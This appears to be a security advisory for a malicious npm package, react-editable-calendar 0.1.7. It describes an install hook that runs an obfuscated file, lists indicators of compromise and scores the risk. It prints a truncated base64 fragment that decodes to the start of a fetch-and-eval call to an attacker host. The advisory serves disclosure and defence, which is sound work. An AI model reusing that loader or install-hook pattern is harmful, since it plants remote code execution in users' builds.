VDB
GCVE-110-OSM-2026-6750
GCVE-110-OSM-2026-6750
Advisory PublishedCVSS 9.6/10
Malicious package detected. Behaviors: obfuscated code, install-time execution.
ENTRY
dist/index.d.js (install-hook: node dist/index.d.js)
- Install Hook Executes Local JS File in package.json
OBFUSCATION
- Global Variable Shadowing in dist/index.d.js: "const require = ("
- Decoded Base64 Content in dist/index.d.js
- Decoded Base64 Content in [deobfuscated] dist/index.d.js
- Dynamic Base64 Decoding in dist/index.d.js: "Buffer.from(b4, "base64")"
- Base64 Encoded Payload in dist/index.d.js: "'KGFzeW5jKCk9PmV2YWwoYXdhaXQgZmV0Y2goJ2h0dHBzOi8vZXZlcnlkYXlub2RlY2hlY2tlci0zOTE..."
- Strings Extracted from Deobfuscated Code in dist/index.d.js
- recovered 1 urls, 1 domains from decoded/deobfuscated content
ADDITIONAL FINDINGS
- Brand New Package
- Very New NPM Publisher Account
- Rapid Version Publishing
PAYLOAD FILES
dist/index.d.js (+ [deobfuscated] dist/index.d.js)
INDICATORS (IOCs)
- urls: https://everydaynodechecker-39143n.vercel.app/api/key?mem=master
- domains: everydaynodechecker-39143n.vercel.app
- payloadFileHash: a62f4eba2412b724cd99f542a19cfbc7573937a904410f298109a56599118888
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | react-editable-calendar | 0.1.7 (affected) | — |
Aliases
Browse GCVE Records
73,738 records in the GCVE database · Updated July 19, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.